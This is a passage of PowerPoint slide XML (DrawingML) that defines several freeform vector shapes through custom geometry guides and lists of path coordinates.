                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3565525" y="5857875"/>
                <a:ext cx="173038" cy="263525"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 478 w 479"/>
                  <a:gd name="T1" fmla="*/ 78 h 730"/>
                  <a:gd name="T2" fmla="*/ 389 w 479"/>
                  <a:gd name="T3" fmla="*/ 215 h 730"/>
                  <a:gd name="T4" fmla="*/ 462 w 479"/>
                  <a:gd name="T5" fmla="*/ 257 h 730"/>
                  <a:gd name="T6" fmla="*/ 410 w 479"/>
                  <a:gd name="T7" fmla="*/ 341 h 730"/>
                  <a:gd name="T8" fmla="*/ 336 w 479"/>
                  <a:gd name="T9" fmla="*/ 294 h 730"/>
                  <a:gd name="T10" fmla="*/ 173 w 479"/>
                  <a:gd name="T11" fmla="*/ 551 h 730"/>
                  <a:gd name="T12" fmla="*/ 173 w 479"/>
                  <a:gd name="T13" fmla="*/ 551 h 730"/>
                  <a:gd name="T14" fmla="*/ 158 w 479"/>
                  <a:gd name="T15" fmla="*/ 577 h 730"/>
                  <a:gd name="T16" fmla="*/ 158 w 479"/>
                  <a:gd name="T17" fmla="*/ 593 h 730"/>
                  <a:gd name="T18" fmla="*/ 158 w 479"/>
                  <a:gd name="T19" fmla="*/ 593 h 730"/>
                  <a:gd name="T20" fmla="*/ 163 w 479"/>
                  <a:gd name="T21" fmla="*/ 614 h 730"/>
                  <a:gd name="T22" fmla="*/ 184 w 479"/>
                  <a:gd name="T23" fmla="*/ 630 h 730"/>
                  <a:gd name="T24" fmla="*/ 184 w 479"/>
                  <a:gd name="T25" fmla="*/ 630 h 730"/>
                  <a:gd name="T26" fmla="*/ 194 w 479"/>
                  <a:gd name="T27" fmla="*/ 635 h 730"/>
                  <a:gd name="T28" fmla="*/ 194 w 479"/>
                  <a:gd name="T29" fmla="*/ 635 h 730"/>
                  <a:gd name="T30" fmla="*/ 210 w 479"/>
                  <a:gd name="T31" fmla="*/ 645 h 730"/>
                  <a:gd name="T32" fmla="*/ 158 w 479"/>
                  <a:gd name="T33" fmla="*/ 729 h 730"/>
                  <a:gd name="T34" fmla="*/ 158 w 479"/>
                  <a:gd name="T35" fmla="*/ 729 h 730"/>
                  <a:gd name="T36" fmla="*/ 116 w 479"/>
                  <a:gd name="T37" fmla="*/ 703 h 730"/>
                  <a:gd name="T38" fmla="*/ 116 w 479"/>
                  <a:gd name="T39" fmla="*/ 703 h 730"/>
                  <a:gd name="T40" fmla="*/ 74 w 479"/>
                  <a:gd name="T41" fmla="*/ 682 h 730"/>
                  <a:gd name="T42" fmla="*/ 74 w 479"/>
                  <a:gd name="T43" fmla="*/ 682 h 730"/>
                  <a:gd name="T44" fmla="*/ 42 w 479"/>
                  <a:gd name="T45" fmla="*/ 656 h 730"/>
                  <a:gd name="T46" fmla="*/ 21 w 479"/>
                  <a:gd name="T47" fmla="*/ 640 h 730"/>
                  <a:gd name="T48" fmla="*/ 21 w 479"/>
                  <a:gd name="T49" fmla="*/ 640 h 730"/>
                  <a:gd name="T50" fmla="*/ 6 w 479"/>
                  <a:gd name="T51" fmla="*/ 619 h 730"/>
                  <a:gd name="T52" fmla="*/ 0 w 479"/>
                  <a:gd name="T53" fmla="*/ 598 h 730"/>
                  <a:gd name="T54" fmla="*/ 0 w 479"/>
                  <a:gd name="T55" fmla="*/ 598 h 730"/>
                  <a:gd name="T56" fmla="*/ 0 w 479"/>
                  <a:gd name="T57" fmla="*/ 572 h 730"/>
                  <a:gd name="T58" fmla="*/ 11 w 479"/>
                  <a:gd name="T59" fmla="*/ 545 h 730"/>
                  <a:gd name="T60" fmla="*/ 11 w 479"/>
                  <a:gd name="T61" fmla="*/ 545 h 730"/>
                  <a:gd name="T62" fmla="*/ 42 w 479"/>
                  <a:gd name="T63" fmla="*/ 488 h 730"/>
                  <a:gd name="T64" fmla="*/ 216 w 479"/>
                  <a:gd name="T65" fmla="*/ 215 h 730"/>
                  <a:gd name="T66" fmla="*/ 158 w 479"/>
                  <a:gd name="T67" fmla="*/ 178 h 730"/>
                  <a:gd name="T68" fmla="*/ 210 w 479"/>
                  <a:gd name="T69" fmla="*/ 94 h 730"/>
                  <a:gd name="T70" fmla="*/ 273 w 479"/>
                  <a:gd name="T71" fmla="*/ 136 h 730"/>
                  <a:gd name="T72" fmla="*/ 357 w 479"/>
                  <a:gd name="T73" fmla="*/ 0 h 730"/>
                  <a:gd name="T74" fmla="*/ 478 w 479"/>
                  <a:gd name="T75" fmla="*/ 78 h 7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79" h="730">
                    <a:moveTo>
                      <a:pt x="478" y="78"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="389" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="78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0" name="Freeform 84"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3646488" y="5902325"/>
                <a:ext cx="182562" cy="258763"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 410 w 505"/>
                  <a:gd name="T1" fmla="*/ 236 h 720"/>
                  <a:gd name="T2" fmla="*/ 121 w 505"/>
                  <a:gd name="T3" fmla="*/ 719 h 720"/>
                  <a:gd name="T4" fmla="*/ 0 w 505"/>
                  <a:gd name="T5" fmla="*/ 646 h 720"/>
                  <a:gd name="T6" fmla="*/ 284 w 505"/>
                  <a:gd name="T7" fmla="*/ 162 h 720"/>
                  <a:gd name="T8" fmla="*/ 410 w 505"/>
                  <a:gd name="T9" fmla="*/ 236 h 720"/>
                  <a:gd name="T10" fmla="*/ 504 w 505"/>
                  <a:gd name="T11" fmla="*/ 73 h 720"/>
                  <a:gd name="T12" fmla="*/ 441 w 505"/>
                  <a:gd name="T13" fmla="*/ 178 h 720"/>
                  <a:gd name="T14" fmla="*/ 321 w 505"/>
                  <a:gd name="T15" fmla="*/ 105 h 720"/>
                  <a:gd name="T16" fmla="*/ 383 w 505"/>
                  <a:gd name="T17" fmla="*/ 0 h 720"/>
                  <a:gd name="T18" fmla="*/ 504 w 505"/>
                  <a:gd name="T19" fmla="*/ 73 h 7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05" h="720">
                    <a:moveTo>
                      <a:pt x="410" y="236"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="121" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="236"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="504" y="73"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="441" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="73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1" name="Freeform 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3746500" y="6024563"/>
                <a:ext cx="184150" cy="207962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 163 w 511"/>
                  <a:gd name="T1" fmla="*/ 315 h 578"/>
                  <a:gd name="T2" fmla="*/ 142 w 511"/>
                  <a:gd name="T3" fmla="*/ 357 h 578"/>
                  <a:gd name="T4" fmla="*/ 132 w 511"/>
                  <a:gd name="T5" fmla="*/ 399 h 578"/>
                  <a:gd name="T6" fmla="*/ 137 w 511"/>
                  <a:gd name="T7" fmla="*/ 436 h 578"/>
                  <a:gd name="T8" fmla="*/ 147 w 511"/>
                  <a:gd name="T9" fmla="*/ 451 h 578"/>
                  <a:gd name="T10" fmla="*/ 163 w 511"/>
                  <a:gd name="T11" fmla="*/ 462 h 578"/>
                  <a:gd name="T12" fmla="*/ 194 w 511"/>
                  <a:gd name="T13" fmla="*/ 472 h 578"/>
                  <a:gd name="T14" fmla="*/ 220 w 511"/>
                  <a:gd name="T15" fmla="*/ 462 h 578"/>
                  <a:gd name="T16" fmla="*/ 247 w 511"/>
                  <a:gd name="T17" fmla="*/ 441 h 578"/>
                  <a:gd name="T18" fmla="*/ 394 w 511"/>
                  <a:gd name="T19" fmla="*/ 462 h 578"/>
                  <a:gd name="T20" fmla="*/ 367 w 511"/>
                  <a:gd name="T21" fmla="*/ 504 h 578"/>
                  <a:gd name="T22" fmla="*/ 310 w 511"/>
                  <a:gd name="T23" fmla="*/ 556 h 578"/>
                  <a:gd name="T24" fmla="*/ 279 w 511"/>
                  <a:gd name="T25" fmla="*/ 572 h 578"/>
                  <a:gd name="T26" fmla="*/ 205 w 511"/>
                  <a:gd name="T27" fmla="*/ 577 h 578"/>
                  <a:gd name="T28" fmla="*/ 121 w 511"/>
                  <a:gd name="T29" fmla="*/ 546 h 578"/>
                  <a:gd name="T30" fmla="*/ 90 w 511"/>
                  <a:gd name="T31" fmla="*/ 530 h 578"/>
                  <a:gd name="T32" fmla="*/ 43 w 511"/>
                  <a:gd name="T33" fmla="*/ 488 h 578"/>
                  <a:gd name="T34" fmla="*/ 26 w 511"/>
                  <a:gd name="T35" fmla="*/ 467 h 578"/>
                  <a:gd name="T36" fmla="*/ 6 w 511"/>
                  <a:gd name="T37" fmla="*/ 420 h 578"/>
                  <a:gd name="T38" fmla="*/ 0 w 511"/>
                  <a:gd name="T39" fmla="*/ 378 h 578"/>
                  <a:gd name="T40" fmla="*/ 6 w 511"/>
                  <a:gd name="T41" fmla="*/ 330 h 578"/>
                  <a:gd name="T42" fmla="*/ 21 w 511"/>
                  <a:gd name="T43" fmla="*/ 278 h 578"/>
                  <a:gd name="T44" fmla="*/ 69 w 511"/>
                  <a:gd name="T45" fmla="*/ 183 h 578"/>
                  <a:gd name="T46" fmla="*/ 126 w 511"/>
                  <a:gd name="T47" fmla="*/ 89 h 578"/>
                  <a:gd name="T48" fmla="*/ 158 w 511"/>
                  <a:gd name="T49" fmla="*/ 53 h 578"/>
                  <a:gd name="T50" fmla="*/ 194 w 511"/>
                  <a:gd name="T51" fmla="*/ 26 h 578"/>
                  <a:gd name="T52" fmla="*/ 237 w 511"/>
                  <a:gd name="T53" fmla="*/ 5 h 578"/>
                  <a:gd name="T54" fmla="*/ 284 w 511"/>
                  <a:gd name="T55" fmla="*/ 0 h 578"/>
                  <a:gd name="T56" fmla="*/ 310 w 511"/>
                  <a:gd name="T57" fmla="*/ 0 h 578"/>
                  <a:gd name="T58" fmla="*/ 367 w 511"/>
                  <a:gd name="T59" fmla="*/ 16 h 578"/>
                  <a:gd name="T60" fmla="*/ 399 w 511"/>
                  <a:gd name="T61" fmla="*/ 31 h 578"/>
                  <a:gd name="T62" fmla="*/ 467 w 511"/>
                  <a:gd name="T63" fmla="*/ 79 h 578"/>
                  <a:gd name="T64" fmla="*/ 478 w 511"/>
                  <a:gd name="T65" fmla="*/ 100 h 578"/>
                  <a:gd name="T66" fmla="*/ 510 w 511"/>
                  <a:gd name="T67" fmla="*/ 178 h 578"/>
                  <a:gd name="T68" fmla="*/ 510 w 511"/>
                  <a:gd name="T69" fmla="*/ 220 h 578"/>
                  <a:gd name="T70" fmla="*/ 494 w 511"/>
                  <a:gd name="T71" fmla="*/ 273 h 578"/>
                  <a:gd name="T72" fmla="*/ 447 w 511"/>
                  <a:gd name="T73" fmla="*/ 378 h 578"/>
                  <a:gd name="T74" fmla="*/ 184 w 511"/>
                  <a:gd name="T75" fmla="*/ 273 h 578"/>
                  <a:gd name="T76" fmla="*/ 373 w 511"/>
                  <a:gd name="T77" fmla="*/ 215 h 578"/>
                  <a:gd name="T78" fmla="*/ 378 w 511"/>
                  <a:gd name="T79" fmla="*/ 194 h 578"/>
                  <a:gd name="T80" fmla="*/ 384 w 511"/>
                  <a:gd name="T81" fmla="*/ 173 h 578"/>
                  <a:gd name="T82" fmla="*/ 378 w 511"/>
                  <a:gd name="T83" fmla="*/ 142 h 578"/>
                  <a:gd name="T84" fmla="*/ 367 w 511"/>
                  <a:gd name="T85" fmla="*/ 126 h 578"/>
                  <a:gd name="T86" fmla="*/ 347 w 511"/>
                  <a:gd name="T87" fmla="*/ 115 h 578"/>
                  <a:gd name="T88" fmla="*/ 310 w 511"/>
                  <a:gd name="T89" fmla="*/ 110 h 578"/>
                  <a:gd name="T90" fmla="*/ 294 w 511"/>
                  <a:gd name="T91" fmla="*/ 110 h 578"/>
                  <a:gd name="T92" fmla="*/ 279 w 511"/>
                  <a:gd name="T93" fmla="*/ 120 h 578"/>
                  <a:gd name="T94" fmla="*/ 252 w 511"/>
                  <a:gd name="T95" fmla="*/ 147 h 578"/>
                  <a:gd name="T96" fmla="*/ 220 w 511"/>
                  <a:gd name="T97" fmla="*/ 200 h 578"/>
                  <a:gd name="T98" fmla="*/ 352 w 511"/>
                  <a:gd name="T99" fmla="*/ 267 h 5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11" h="578">
                    <a:moveTo>
                      <a:pt x="163" y="315"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="163" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="315"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="373" y="215"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="373" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="215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2" name="Freeform 86"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3902075" y="6097588"/>
                <a:ext cx="184150" cy="212725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 142 w 510"/>
                  <a:gd name="T1" fmla="*/ 368 h 589"/>
                  <a:gd name="T2" fmla="*/ 136 w 510"/>
                  <a:gd name="T3" fmla="*/ 431 h 589"/>
                  <a:gd name="T4" fmla="*/ 142 w 510"/>
                  <a:gd name="T5" fmla="*/ 441 h 589"/>
                  <a:gd name="T6" fmla="*/ 178 w 510"/>
                  <a:gd name="T7" fmla="*/ 473 h 589"/>
                  <a:gd name="T8" fmla="*/ 204 w 510"/>
                  <a:gd name="T9" fmla="*/ 484 h 589"/>
                  <a:gd name="T10" fmla="*/ 230 w 510"/>
                  <a:gd name="T11" fmla="*/ 478 h 589"/>
                  <a:gd name="T12" fmla="*/ 252 w 510"/>
                  <a:gd name="T13" fmla="*/ 468 h 589"/>
                  <a:gd name="T14" fmla="*/ 267 w 510"/>
                  <a:gd name="T15" fmla="*/ 441 h 589"/>
                  <a:gd name="T16" fmla="*/ 273 w 510"/>
                  <a:gd name="T17" fmla="*/ 400 h 589"/>
                  <a:gd name="T18" fmla="*/ 262 w 510"/>
                  <a:gd name="T19" fmla="*/ 379 h 589"/>
                  <a:gd name="T20" fmla="*/ 173 w 510"/>
                  <a:gd name="T21" fmla="*/ 289 h 589"/>
                  <a:gd name="T22" fmla="*/ 152 w 510"/>
                  <a:gd name="T23" fmla="*/ 268 h 589"/>
                  <a:gd name="T24" fmla="*/ 120 w 510"/>
                  <a:gd name="T25" fmla="*/ 221 h 589"/>
                  <a:gd name="T26" fmla="*/ 110 w 510"/>
                  <a:gd name="T27" fmla="*/ 200 h 589"/>
                  <a:gd name="T28" fmla="*/ 110 w 510"/>
                  <a:gd name="T29" fmla="*/ 147 h 589"/>
                  <a:gd name="T30" fmla="*/ 126 w 510"/>
                  <a:gd name="T31" fmla="*/ 95 h 589"/>
                  <a:gd name="T32" fmla="*/ 142 w 510"/>
                  <a:gd name="T33" fmla="*/ 69 h 589"/>
                  <a:gd name="T34" fmla="*/ 163 w 510"/>
                  <a:gd name="T35" fmla="*/ 43 h 589"/>
                  <a:gd name="T36" fmla="*/ 215 w 510"/>
                  <a:gd name="T37" fmla="*/ 11 h 589"/>
                  <a:gd name="T38" fmla="*/ 252 w 510"/>
                  <a:gd name="T39" fmla="*/ 0 h 589"/>
                  <a:gd name="T40" fmla="*/ 289 w 510"/>
                  <a:gd name="T41" fmla="*/ 0 h 589"/>
                  <a:gd name="T42" fmla="*/ 383 w 510"/>
                  <a:gd name="T43" fmla="*/ 27 h 589"/>
                  <a:gd name="T44" fmla="*/ 420 w 510"/>
                  <a:gd name="T45" fmla="*/ 48 h 589"/>
                  <a:gd name="T46" fmla="*/ 477 w 510"/>
                  <a:gd name="T47" fmla="*/ 95 h 589"/>
                  <a:gd name="T48" fmla="*/ 498 w 510"/>
                  <a:gd name="T49" fmla="*/ 126 h 589"/>
                  <a:gd name="T50" fmla="*/ 509 w 510"/>
                  <a:gd name="T51" fmla="*/ 184 h 589"/>
                  <a:gd name="T52" fmla="*/ 493 w 510"/>
                  <a:gd name="T53" fmla="*/ 253 h 589"/>
                  <a:gd name="T54" fmla="*/ 362 w 510"/>
                  <a:gd name="T55" fmla="*/ 221 h 589"/>
                  <a:gd name="T56" fmla="*/ 378 w 510"/>
                  <a:gd name="T57" fmla="*/ 184 h 589"/>
                  <a:gd name="T58" fmla="*/ 378 w 510"/>
                  <a:gd name="T59" fmla="*/ 153 h 589"/>
                  <a:gd name="T60" fmla="*/ 367 w 510"/>
                  <a:gd name="T61" fmla="*/ 132 h 589"/>
                  <a:gd name="T62" fmla="*/ 341 w 510"/>
                  <a:gd name="T63" fmla="*/ 116 h 589"/>
                  <a:gd name="T64" fmla="*/ 289 w 510"/>
                  <a:gd name="T65" fmla="*/ 111 h 589"/>
                  <a:gd name="T66" fmla="*/ 278 w 510"/>
                  <a:gd name="T67" fmla="*/ 116 h 589"/>
                  <a:gd name="T68" fmla="*/ 252 w 510"/>
                  <a:gd name="T69" fmla="*/ 143 h 589"/>
                  <a:gd name="T70" fmla="*/ 252 w 510"/>
                  <a:gd name="T71" fmla="*/ 163 h 589"/>
                  <a:gd name="T72" fmla="*/ 252 w 510"/>
                  <a:gd name="T73" fmla="*/ 184 h 589"/>
                  <a:gd name="T74" fmla="*/ 283 w 510"/>
                  <a:gd name="T75" fmla="*/ 232 h 589"/>
                  <a:gd name="T76" fmla="*/ 351 w 510"/>
                  <a:gd name="T77" fmla="*/ 289 h 589"/>
                  <a:gd name="T78" fmla="*/ 394 w 510"/>
                  <a:gd name="T79" fmla="*/ 337 h 589"/>
                  <a:gd name="T80" fmla="*/ 414 w 510"/>
                  <a:gd name="T81" fmla="*/ 384 h 589"/>
                  <a:gd name="T82" fmla="*/ 420 w 510"/>
                  <a:gd name="T83" fmla="*/ 410 h 589"/>
                  <a:gd name="T84" fmla="*/ 409 w 510"/>
                  <a:gd name="T85" fmla="*/ 457 h 589"/>
                  <a:gd name="T86" fmla="*/ 399 w 510"/>
                  <a:gd name="T87" fmla="*/ 489 h 589"/>
                  <a:gd name="T88" fmla="*/ 351 w 510"/>
                  <a:gd name="T89" fmla="*/ 552 h 589"/>
